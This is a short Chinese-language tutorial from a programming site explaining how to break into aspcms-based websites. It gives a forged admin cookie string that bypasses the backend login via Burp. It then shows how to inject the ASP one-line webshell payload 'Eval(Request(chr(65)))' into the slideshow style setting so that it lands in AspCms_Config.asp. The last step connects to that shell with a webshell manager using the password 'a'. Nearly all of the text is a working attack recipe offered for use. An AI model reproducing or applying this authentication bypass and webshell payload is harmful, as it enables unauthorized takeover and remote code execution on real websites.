微学网

热门关键词:   as  thinkphp  ecshop  xxx  php分页  商务通
热门: ASP.NET PHP编程 ASP编程 JSP编程 Python

aspcms漏洞以及拿shell的方法

发布时间:2020-03-26 来源:未知 点击:

首先找到aspcms程序后台登录地址,然后访问home.asp是否存在,如果存在会提示尚未登录无法访问。然后重新访问home.asp。burp抓包修改cookie

 

声明一下:如果修改cookie 提示重新登陆的话 考虑用户名不是admin

cookie内容修改如下:

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

 

1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”

使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

 

然后用xise6.7 连接

http://www.xxxx.com/config/AspCms_Config.asp 密码a


这就是微学网-程序员之家为你提供的"aspcms漏洞以及拿shell的方法"希望对你有所帮助.本文来自网络,转载请注明出处:http://www.weixuecn.cn/article/11223.html

上一篇:aspcms后台漏洞解决方案

下一篇:没有了

网络编程 | 前端制作 | 数据库 | CMS教程 | 脚本编程 | 框架 | 微信公众号 | 小程序 | 服务器 | APP开发 |

凡本网站转载的文章、图片等资料的版权归版权所有人所有,因无法和版权所有者一一联系,如果本网站选取的文/图威胁到您的权益,请您及时和本网站联系。 我们会在第一时间内采取措施,避免给双方造 成不必要的损失。
© 2015-2018 微学网 版权所有,并保留所有权利。 备案号:粤ICP备09051474号-1

电脑版 | 移动版